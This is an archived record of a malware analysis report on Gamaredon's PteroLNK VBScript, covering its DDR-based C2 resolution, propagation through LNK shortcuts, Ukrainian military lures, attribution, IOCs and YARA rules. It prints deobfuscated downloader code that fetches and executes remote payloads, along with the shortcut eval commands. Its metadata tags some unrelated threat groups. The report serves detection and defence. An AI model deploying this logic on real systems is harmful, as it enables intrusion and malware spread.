{
	"id": "d4e894c8-5186-42b8-9e6d-8af54fe8c0f2",
	"created_at": "2026-04-06T00:12:20.137289Z",
	"updated_at": "2026-04-10T03:37:04.24177Z",
	"deleted_at": null,
	"sha1_hash": "358e912932c6cabc6c096988d0c425b0d856acbb",
	"title": "Inside Gamaredon's PteroLNK: Dead Drop Resolvers and evasive Infrastructure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 943688,
	"plain_text": "Inside Gamaredon's PteroLNK: Dead Drop Resolvers and evasive Infrastructure\r\nPublished: 2025-04-16 · Archived: 2026-04-05 13:29:40 UTC\r\nIdentifier: TRR250401.\r\nhttps://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\nPage 1 of 13\n\nProactively hunting for Russian-nexus threats, we identified samples from the Pterodo malware family, commonly\r\nassociated with Gamaredon, uploaded to a public malware analysis platform between late 2024 and mid-March\r\n2025. Notably, related Gamaredon Dead Drop Resolvers (DDR) are still being updated daily, indicating active\r\noperations.\r\nThe Pterodo malware ecosystem has been previously documented by ESET in 2024, covering the years\r\n2022-2023. Broader coverage of Gamaredon is inversely proportional to the group’s proliferation and impact. Existing\r\npublications on Gamaredon often focus on samples that are not publicly available, which limits the ability of the\r\nsecurity community to conduct further analysis and research. Importantly, we found no publicly available analysis\r\nof the specific malware samples discussed in this report.\r\nThis report provides a detailed technical analysis of Gamaredon’s PteroLNK VBScript malware and its supporting\r\ninfrastructure. Victimology insights are derived from gathered samples’ contents and the limited context they\r\nprovide.\r\nPteroLNK\r\nPteroLNK VBScript files are heavily obfuscated, a hallmark of Gamaredon’s techniques. 
The main script\r\ndynamically constructs two additional VBScript payloads during execution: a downloader and an LNK dropper.\r\nThe malware structure remains consistent with past samples analyzed by ESET in 2023-2024.\r\nThe scripts are designed to allow flexibility for their operators, enabling easy modification of parameters such as\r\nfile names and paths, persistence mechanisms (registry keys and scheduled tasks), and detection logic for security\r\nsolutions on the target system.\r\nThe primary PteroLNK VBScript (MD5 98CF1A959F11AF59BD5AC2C2D746541F) is tasked with deploying the two\r\nbase64-encoded payloads, establishing persistence through scheduled tasks, and concealing its activities by\r\nmodifying Windows Explorer settings to hide files. Upon execution, it drops a copy of itself to:\r\n%PUBLIC%\\NTUSER.DAT.TMContainer\r\n%APPDATA%\\~.drv\r\nAnd deploys the two script payloads to:\r\n%PUBLIC%\\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms – Downloader (MD5\r\nA38399ECB70B504573CE708C7A26C306)\r\n%PUBLIC%\\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms – LNK Dropper (MD5\r\n09958DEBBD3336D374892D92C8939D75)\r\nThe downloader payload is scheduled to execute every 3 minutes, while the LNK dropper script runs every 9\r\nminutes. The malware also incorporates conditional execution logic to adapt its behaviour based on the presence of\r\nthe “360 Total Security” antivirus on the host system. If this antivirus is detected, both payloads are executed and\r\nkept persistent through an infinite loop instead of scheduled tasks. In this scenario, no actions are\r\ntaken to conceal files either.\r\nDownloader\r\nThis payload serves as a downloader which is designed to retrieve and deploy additional malware. 
It employs a\r\nmodular, multi-stage structure to establish and maintain communication with its C2 infrastructure.\r\nEach stage is triggered by an increasing error counter, enabling the malware to pivot between fallback\r\nmechanisms. The Windows registry is leveraged to persistently store and retrieve the C2 addresses across\r\nexecution cycles.\r\nHere is an example of a Downloader (MD5 A38399ECB70B504573CE708C7A26C306) main function code,\r\ndeobfuscated for readability:\r\nOn Error Resume Next\r\nDim userAgent, response, executionResult, url, errorCounter, computerName, serialNumber, extractedText, regexPattern\r\nerrorCounter = 0\r\nDDR = \"hxxps://telegra[.]ph/Vizit-12-28\"\r\nregexPattern = \"\\\u003c\\/address\\\u003e\\\u003cp\\\u003e(.*?)\\\u003c\\/p\\\u003e\\\u003c\\/article\\\u003e\"\r\nC2RegKey = ReadRegistry(\"WindowsUpdates\")\r\nC2BackupRegKey = ReadRegistry(\"WindowsResponby\")\r\nIf (Len(C2RegKey) \u003e 10) Then\r\n    url = C2RegKey\r\nEnd If\r\nIf (Len(C2RegKey) \u003c 21) Then\r\n    url = C2BackupRegKey\r\n    If (Len(C2BackupRegKey) \u003c 21) Then\r\n        errorCounter = errorCounter + 1\r\n    End If\r\nEnd If\r\nSleep 1439\r\nuserAgent = CreateUserAgent(\"Join\")\r\nSleep 1848\r\nexecutionResult = ProcessPayload(userAgent)\r\nDo Until executionResult = \"\"\r\n    Sleep 1848\r\n    ExecuteGlobal(executionResult)\r\n    Sleep 21493\r\n    executionResult = ProcessPayload(userAgent)\r\nLoop\r\nUpon execution, the script attempts to read existing C2 addresses from previous runs stored in the\r\nHKEY_CURRENT_USER\\Console\\WindowsUpdates (primary C2) and HKEY_CURRENT_USER\\Console\\WindowsResponby\r\n(backup C2) registry keys. It then generates a custom HTTP “User-Agent” string containing the computer name\r\nand system drive serial number, uniquely identifying the infected machine to the C2 server. 
This string is spliced\r\nrandomly between two predefined User-Agent templates embedded within the malware.\r\nGenerated User-Agent example:\r\nUser-Agent: Mozilla/5.0 (Windows N ::USER-PC_11223344::/.nJoin/.T 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, l\r\nThe script begins by checking for internet connectivity via a benign website. Any HTTP status code other than 404\r\n(Not Found) or 200 (OK) increments the global error counter. As this counter increases, additional requests will be\r\ngenerated for each execution iteration.\r\nIf a C2 address is already stored in the backup C2 registry key from previous executions, the script sends a simple\r\nrequest to a Ukrainian streaming service: sweet.tv. Otherwise, the first request will be sent to the Ukrainian\r\nnews site ukr.net, alongside a request to the hardcoded dead drop resolver (DDR) at\r\nhxxps://telegra[.]ph/Vizit-12-28. The DDR response is parsed using the hardcoded regex pattern shown above\r\n(regexPattern) to extract an updated C2 address.\r\nNext, the script sends another HTTP GET request to the extracted C2 tunnel address, which is hosted on\r\ntrycloudflare.com, using its custom User-Agent. If the tunnel responds with a 404 status code, it extracts an\r\nupdated C2 from the response. It saves the domain portion in the WindowsResponby (backup C2) registry key and\r\nthe URI portion in the WindowsDetect (C2 URI) registry key. 
If any errors were encountered during execution, a\r\ncopy of the C2 domain is saved under the registry key WindowsUpdates (primary C2) as well.\r\nExample request to the C2 tunnel and its 404 response carrying an updated C2 address in the body (redacted):\r\nGET /comp/\u003cREDACTED\u003e HTTP/1.1\r\nAccept: */*\r\nAccept-Language: uk-UA\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ::USER-PC_11223344::\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nHost: des-cinema-democrat-san.trycloudflare[.]com\r\nConnection: Keep-Alive\r\n\r\nHTTP/1.1 404 Not Found\r\nDate: \u003cREDACTED\u003e\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nCF-Ray: \u003cREDACTED\u003e\r\nCF-Cache-Status: DYNAMIC\r\nVary: Accept-Encoding\r\nServer: cloudflare\r\nContent-Encoding: gzip\r\n\r\nhxxps://sign-nothing-fitted-intelligence.trycloudflare[.]com/@din3/VByOMkbbyIt?\u003cREDACTED\u003e\r\nIf the error counter increases further, the script attempts to reach bbc.com while querying another DDR hosted\r\non teletype.in. The DDR address is dynamically constructed from the URI extracted from the previous C2\r\ntunnel response (see above @din3/VByOMkbbyIt... ) and saved in the C2 URI registry key (WindowsDetect). The\r\nresulting DDR in our example looks like: hxxps://teletype[.]in/@din3/VByOMkbbyIt?... . 
From this new DDR,\r\nanother C2 address is fetched using Internet Explorer and parsed with a new regex pattern:\r\n\\\u003c\\!--\\[--\\\u003e\\\u003c\\!--\\]--\\\u003e\\\u003c\\!--\\[--\\\u003e(.*?)\\\u003c\\!--\\]--\\\u003e\\\u003c\\/p\\\u003e\\\u003c\\!--\\]--\\\u003e\\\u003c\\/article\\\u003e\\\u003c\\!----\\\u003e\r\nThe extracted address is prepended with https:// and saved in the primary C2 registry key.\r\nExcerpt of a Teletype DDR page (truncated):\r\n\u003ch1 class=\"article__header_title\" itemprop=\"headline\" data-v-8e275b20\u003ekisa\u003c/h1\u003e\u003c/header\u003e\u003carticle class=\"article\r\nIf further errors occur, the script attempts to reach the Russian news site vesti.ru, while leveraging check-host.net\r\nto resolve another hard-coded C2 domain formatted as \u003c2-digits\u003e\u003cword\u003e.mahombres[.]ru. The IP\r\nresolution provided by check-host.net is prefixed with http:// and stored in the primary C2 registry key.\r\nWhile check-host.net attempts to block abuse of its service for resolving these C2s, it still provides resolutions\r\nfor some domains.\r\nOn each execution iteration, the script processes server responses expected to contain Base64-encoded VBScript\r\npayloads. These payloads are decoded and executed on the infected system.\r\nLNK Dropper\r\nThe purpose of this payload is to propagate through local and network drives, systematically replacing existing\r\nfiles and folders with deceptive shortcuts and hiding the original files. These shortcuts are configured to execute\r\nthe main PteroLNK VBScript malware, which is also copied to the same folder as the LNK files, via mshta.exe.\r\nThis mechanism allows PteroLNK to propagate to other hosts sharing the same storage, by having users execute\r\nthese links.\r\nUpon execution, the malware modifies Explorer settings in the registry so that hidden files and folders, file\r\nextensions and protected OS files are not shown. 
It then enumerates local and mapped drives, and for each .pdf, .docx and .xlsx file in\r\nthe root of the drive, it creates a malicious shortcut that mimics the original file, while hiding it. The malware\r\nensures that at least two shortcuts are present, otherwise it will choose a filename from an array of military-themed\r\ndecoy filenames in Ukrainian, to generate additional malicious shortcut files. It then copies the main\r\nPteroLNK script (~.drv) to the current folder, saving it using the same filename ~.drv, and also as ~.tmp,\r\n~.ini, if those files already exist. This process repeats for subfolders up to three levels deep.\r\nThe Ukrainian decoy filenames that can be used are:\r\nOriginal Ukrainian|Translated\r\nТаємно|Secretly\r\nДля службового користування|For official use\r\nЗобовязання|Obligation\r\nІнформація щодо загиблих|Casualty information\r\nЗаявка ОК|Application (Operational Command)\r\nВkaзівkи|Instructions\r\nДля службового користування|For official use\r\nЗразок рапорту щомісяця|Sample monthly report\r\nСупровід|Escort/Support\r\nБЛАНК ДОНЕСЕННЯ|Report form\r\nСупровід ГУР|Support of the Main Intelligence Directorate\r\nпродовження контракту|Contract extension\r\nрнбо|National Security and Defense Council (NSDC)\r\nІнженерна служба|Engineering service\r\nзaoхoчeння|Incentive\r\nThe behaviour of the generated shortcuts depends on whether they replace existing, now-hidden documents and\r\nfolders, or if they are created using decoy filenames for non-existing files. 
Shortcuts replacing originals will\r\nattempt to open the original document or folder before executing PteroLNK, while shortcuts created with decoy\r\nfilenames will directly execute PteroLNK.\r\nIn both cases, the shortcuts contain a JavaScript command which leverages wscript.exe:\r\n// Fake shortcuts for existing files/folders:\r\njavascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"explorer $FILE_PATH$\\\"\");w.run(\\\"\"wscript.e\r\n// Shortcuts generated using the hardcoded decoy filenames:\r\njavascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"wscript.exe //e:vb\"\"+\"\"Script \\~.drv \\\"\");w\r\nInfrastructure\r\nGamaredon uses Telegraph and Teletype articles as Dead Drop Resolvers (DDR), which they frequently update\r\n(see Fig. 3 below). These DDRs usually contain a Cloudflare quick tunnel address, but sometimes they briefly\r\npoint to a domain controlled by Gamaredon.\r\nCloudflare quick tunnels can be set up without registration by running a single command and passing it the URL\r\nthe tunnel will redirect to: cloudflared tunnel --url google.com.\r\nCloudflare quick tunnels have existed for over 5 years and have been increasingly adopted by threat actors, given\r\ntheir anonymity and ability to traverse network detection by blending with legitimate traffic. The tunnels remain\r\nactive as long as the actor maintains an open command-line session and can handle up to 200 concurrent requests\r\nper tunnel, making them ideal for low-profile C2 operations.\r\nDead Drop Resolvers\r\nThe Dead Drop Resolvers (DDRs) act as the initial communication node for the samples, and are hard-coded\r\nwithin them, making them arguably the most critical component of the malware infrastructure. 
DDRs provide\r\nGamaredon with great flexibility, allowing them to update the next communication channel as often as needed to\r\nevade detection or disruption.\r\nA timeline analysis of the DDR creation reveals that the earliest DDR was established on December 28, 2024,\r\nwhile the most recent dynamically generated DDR was created on March 26, 2025. Interestingly, the earliest\r\nsample of this PteroLNK variant, uploaded on December 25, 2024, didn’t utilize a DDR. Instead, it directly\r\nleveraged the check-host.net technique to resolve its C2 tienes[.]ru.\r\nAn interactive figure on the original page illustrates a cluster of still active DDRs and their recent update\r\nfrequency between March 24 and April 10, 2025.\r\nIn addition to DDRs utilized by the samples, we identified five C2 domains controlled by Gamaredon, all\r\nregistered via REGRU-RU. At the time of analysis, these domains were also hosted on Cloudflare services.\r\nNotably, Cloudflare had flagged some of them as ‘Suspected Phishing’, triggering a warning message when\r\naccessed. This effectively disrupts the retrieval of payloads from these domains by the analyzed malware.\r\nTargets\r\nThe samples analyzed in this report were predominantly uploaded to online multiscanners from Kyiv, Ukraine,\r\nwith some coming from Dnipro, Rivne, Kupyansk and Odesa between December 2024 and February 2025. This\r\ngeographic clustering aligns with Gamaredon’s focus on Ukrainian targets, particularly government, military and\r\ncritical infrastructure entities.\r\nThe lure filenames used in these samples referenced themes pertaining to the Ukrainian military, such as personnel\r\nlogistics and operational planning. 
Additionally, the samples were configured to beacon to benign Ukrainian\r\nwebsites, such as ukr.net and streaming services like sweet.tv.\r\nAttribution: Gamaredon’s FSB links and ties to longstanding campaigns\r\nThe samples analyzed closely match the PteroLNK description provided by ESET, from the obfuscation methods\r\nto the structure of the payloads within it and their objectives. This consistency strongly supports the attribution of\r\nthe activity to Gamaredon.\r\nSeveral key findings further reinforce this attribution:\r\nOn March 27th, around 09:00 UTC, the contents of the DDR hxxps://telegra[.]ph/Vizit-12-28 were\r\nupdated to point to hxxps://nandayo[.]ru/srgssdfsf. The domain nandayo[.]ru previously resolved to\r\nIP addresses used as C2 infrastructure for Gamaredon implants (194.67.71[.]128, 31.129.22[.]156)\r\nand directly by Gamaredon malware [1].\r\nOn March 31st, a dynamically generated backup DDR hxxps://teletype[.]in/@mew31/y4JyD2Rpb41\r\nstarted pointing to kimiga[.]ru. The domain kimiga[.]ru has been associated with Gamaredon\r\nmultiple times in prior campaigns.\r\nGamaredon has historically used ntuser.dat.tmcontainer as payload filenames, and otherwise prefixes\r\ndropped malware filenames with NTUSER.DAT.TM.\r\nRecent reports by security vendors confirm Gamaredon’s use of Cloudflare quick tunnels for C2\r\ninfrastructure.\r\nThe custom User-Agent beacon delimiter format identified in the samples analyzed has been associated\r\nwith Gamaredon since at least 2022 [2].\r\nGamaredon-controlled domains were all registered via REGRU-RU, a registrar consistently used by\r\nGamaredon in past campaigns.\r\nFinally, the victimology further reinforces the attribution of this activity to Gamaredon. 
The campaign targeted\r\nUkrainian entities using military-themed lures, consistent with Gamaredon’s long-standing focus on Ukrainian\r\ngovernment, military, and critical infrastructure sectors.\r\nGamaredon is widely believed to be associated with Russia’s Federal Security Service (FSB), based on\r\ncompelling evidence provided by Ukrainian authorities and corroborated by multiple independent researchers.\r\nReports link Gamaredon to FSB teams operating within its electronic and signals intelligence and information\r\nsecurity centers, allegedly out of Crimea.\r\nConclusions: Gamaredon’s role, strategy and adaptiveness\r\nGamaredon operates as a critical component of Russia’s cyber operations strategy, particularly in its ongoing war\r\nwith Ukraine. The group’s campaigns have been observed during pivotal phases of the conflict, including\r\nUkraine’s 2023 counteroffensive, highlighting their role in gathering intelligence and disrupting Ukrainian\r\noperations in support of Russia’s military objectives.\r\nGamaredon’s effectiveness lies not in technical sophistication but in tactical adaptability. Their modus operandi\r\ncombines aggressive spearphishing campaigns, rapid deployment of heavily obfuscated custom malware, and\r\nredundant C2 infrastructure. This approach enables them to consistently evade detection, as evidenced by low\r\ndetection rates of their malware. 
The group prioritizes operational impact over stealth, exemplified by pointing\r\ntheir DDRs to long-standing domains publicly linked to their past operations.\r\nAs the conflict evolves, understanding Gamaredon’s tactics and tooling will be critical not only for defending\r\nagainst their operations but also for mitigating possible copycat actors adopting similar techniques across Europe.\r\nThis report provides actionable detection signatures, complete hashes and infrastructure indicators for the\r\nanalyzed samples, all available on online multi-scanners.\r\nAppendix: indicators and detection rules\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nHashes (SHA-256)\r\nFile paths\r\n%PUBLIC%\\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms|PteroLNK downloader payload\r\n%PUBLIC%\\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms|PteroLNK LNK dropper payload\r\n%PUBLIC%\\NTUSER.DAT.TMContainer|PteroLNK 
VBScript\r\n%APPDATA%\\~.drv|PteroLNK VBScript\r\nScheduled tasks\r\n\\Windows\\DeviceDirectoryClient\\RegisterUserDevice|PteroLNK downloader payload\r\n\\Windows\\DeviceDirectoryClient\\RegisterDeviceConnectedToNetwork|PteroLNK LNK dropper payload\r\nRegistry keys\r\nHKEY_CURRENT_USER\\Console\\WindowsUpdates|Primary C2 registry key\r\nHKEY_CURRENT_USER\\Console\\WindowsResponby|Backup C2 registry key\r\nHKEY_CURRENT_USER\\Console\\WindowsDetect|C2 URI registry key\r\nDomains\r\ntienes[.]ru|Gamaredon C2\r\nmahombres[.]ru|Gamaredon C2\r\nkimiga[.]ru|Gamaredon C2\r\nareyouall[.]ru|Gamaredon C2\r\nnandayo[.]ru|Gamaredon C2\r\nHostnames\r\nURLs\r\nhxxps://telegra[.]ph/Vizit-12-28|Dead drop resolver\r\nhxxps://telegra[.]ph/Post-12-20-7|Dead drop resolver (inactive)\r\nhxxps://graph[.]org/LifeNews-02-20|Dead drop resolver\r\nhxxps://telegra[.]ph/VectorsWar-03-06|Dead drop resolver\r\nhxxps://telegra[.]ph/mark-01-20-5|Dead drop resolver\r\nhxxps://telegra[.]ph/Leons-01-13|Dead drop resolver (inactive)\r\nhxxps://telegra[.]ph/Kasiopeya-01-09|Dead drop resolver (inactive)\r\nhxxps://teletype[.]in/@dc1/p9G48lhQVjw|Dead drop resolver (inactive)\r\nhxxps://teletype[.]in/@din3/VByOMkbbyIt|Dead drop resolver\r\nhxxps://teletype[.]in/@mew31/y4JyD2Rpb41|Dead drop resolver\r\nPossibly associated URLs\r\nhxxps://telegra[.]ph/Simphoniya-03-07|Possibly an inactive dead drop resolver\r\nYara rules\r\nrule Gamaredon_PteroLNK_VBScript {\r\n    meta:\r\n        description = \"Matches Gamaredon PteroLNK VBScript samples used in early 2025\"\r\n        references = \"TRR250401\"\r\n        hash = \"d5538812b9a41b90fb9e7d83f2970f947b1e92cb68085e6d896b97ce8ebff705\"\r\n        date = \"2025-04-04\"\r\n        author = \"HarfangLab\"\r\n        context = \"file\"\r\n    strings:\r\n        $vbs = \"on error resume next\" ascii wide\r\n        $a1 = \"=\\\"b24gZXJyb3IgcmVzdW1lIG5leHQNC\" ascii wide\r\n        $b1 = \"\\\"\\\"%PUBLIC%\\\"\\\"\" ascii wide\r\n        $b2 = \"\\\"\\\"%APPDATA%\\\"\\\"\" ascii wide\r\n        $b3 = \"\\\"\\\"REG_DWORD\\\"\\\"\" ascii wide\r\n    condition:\r\n        filesize \u003c 400KB\r\n        and $vbs in (0..2)\r\n        and $a1\r\n        and 1 of ($b*)\r\n}\r\nrule Gamaredon_PteroLNK_LNK {\r\n    meta:\r\n        description = \"Matches Gamaredon PteroLNK-generated LNK files used in early 2025\"\r\n        references = \"TRR250401\"\r\n        hash = \"N/A\"\r\n        date = \"2025-04-04\"\r\n        author = \"HarfangLab\"\r\n        context = \"file\"\r\n    strings:\r\n        $a1 = \"javascript:eval('w=new%20ActiveXObject(\\\\\\\"\\\"WScript.Shell\\\\\\\"\\\");w.run(\\\\\\\"\\\"wscript.exe //e:vb\\\r\n        $a2 = \"javascript:eval('w=new%20ActiveXObject(\\\\\\\"\\\"WScript.Shell\\\\\\\"\\\");w.run(\\\\\\\"\\\"explorer\" ascii wid\r\n        $b1 = \"\\\"\\\");window.close()')\" ascii wide nocase\r\n    condition:\r\n        filesize \u003c 10KB\r\n        and uint32(0) == 0x0000004C // Standard LNK signature\r\n        and uint32(4) == 0x00021401 // Expected values for LNK header\r\n        and 1 of ($a*)\r\n        and $b1\r\n}\r\nSource: https://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/"
	],
	"report_names": [
		"gamaredons-pterolnk-analysis"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf",
			"created_at": "2022-10-25T16:07:24.467088Z",
			"updated_at": "2026-04-10T02:00:05.000485Z",
			"deleted_at": null,
			"main_name": "Circles",
			"aliases": [],
			"source_name": "ETDA:Circles",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/358e912932c6cabc6c096988d0c425b0d856acbb.pdf",
		"text": "https://archive.orkl.eu/358e912932c6cabc6c096988d0c425b0d856acbb.txt",
		"img": "https://archive.orkl.eu/358e912932c6cabc6c096988d0c425b0d856acbb.jpg"
	}
}